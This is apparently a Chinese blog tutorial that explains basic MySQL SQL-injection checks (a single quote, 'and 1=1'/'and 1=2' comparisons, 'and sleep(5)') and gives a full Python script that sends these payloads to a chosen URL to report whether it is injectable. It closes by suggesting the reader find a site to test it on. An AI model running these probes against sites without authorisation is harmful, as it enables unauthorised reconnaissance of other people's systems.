Python-编写一个mysql注入漏洞检测工具

判断mysql网站是否存在注入漏洞的几个方法：

1. 注入点后加上一个单引号会报错
2. and 1=1返回正常页面，and 1=2返回的页面不同于正常页面
3. and sleep(3) 网页会等待3秒左右

根据返回的页面情况我们就能知道是否存在注入漏洞

要获取页面返回的结果是不是一样的，我们可以通过获取请求头中的Content-Length的长度来判断

知道这些后，我们就能来写个简单的python脚本

# -*- coding:utf-8 -*-
__author__ = "MuT6 Sch01aR"

import requests
import argparse
import time

def argparse_option():
    parser = argparse.ArgumentParser(description='The Help of Mysql_Inject.py')
    parser.add_argument('-u','--url',help='The Url To Check')
    args = parser.parse_args()
    return args

def way_1(url):
    payload = [' and 1=1',' and 1=2']
    url_1 = url+payload[0]
    url_2 = url+payload[1]
    r = requests.get(url=url)
    r_1 = requests.get(url=url_1)
    r_2 = requests.get(url=url_2)
    h = r.headers.get('Content-Length')
    h_1 = r_1.headers.get('Content-Length')
    h_2 = r_2.headers.get('Content-Length')
    if h ==h_1 and h !=h_2:
        print("[*] %s can be injected" %url)
    else:
        way_2(url)

def way_2(url):
    payload = ' and sleep(5)'
    t1 = time.time()
    requests.get(url=url+payload)
    t2 = time.time()
    if t2-t1 >5:
        print("[*] %s can be injected" %url)
    else:
        way_3(url)

def way_3(url):
    payload = "'"
    url_1 = url+payload
    r = requests.get(url=url)
    r_1 = requests.get(url=url_1)
    h = r.headers.get('Content-Length')
    h_1 = r_1.headers.get('Content-Length')
    if h != h_1:
        print("[*] %s can be injected" % url)
    else:
        print("[!] %s can't be injected" %url)

if __name__ == '__main__':
    cmd_args = argparse_option()
    url = cmd_args.url
    if url:
        way_1(url)
    else:
        print("Usage:python3 main.py -u [url]")

找个站测试一下

这个脚本还只能检测一些简单的链接，多参数的还检测不了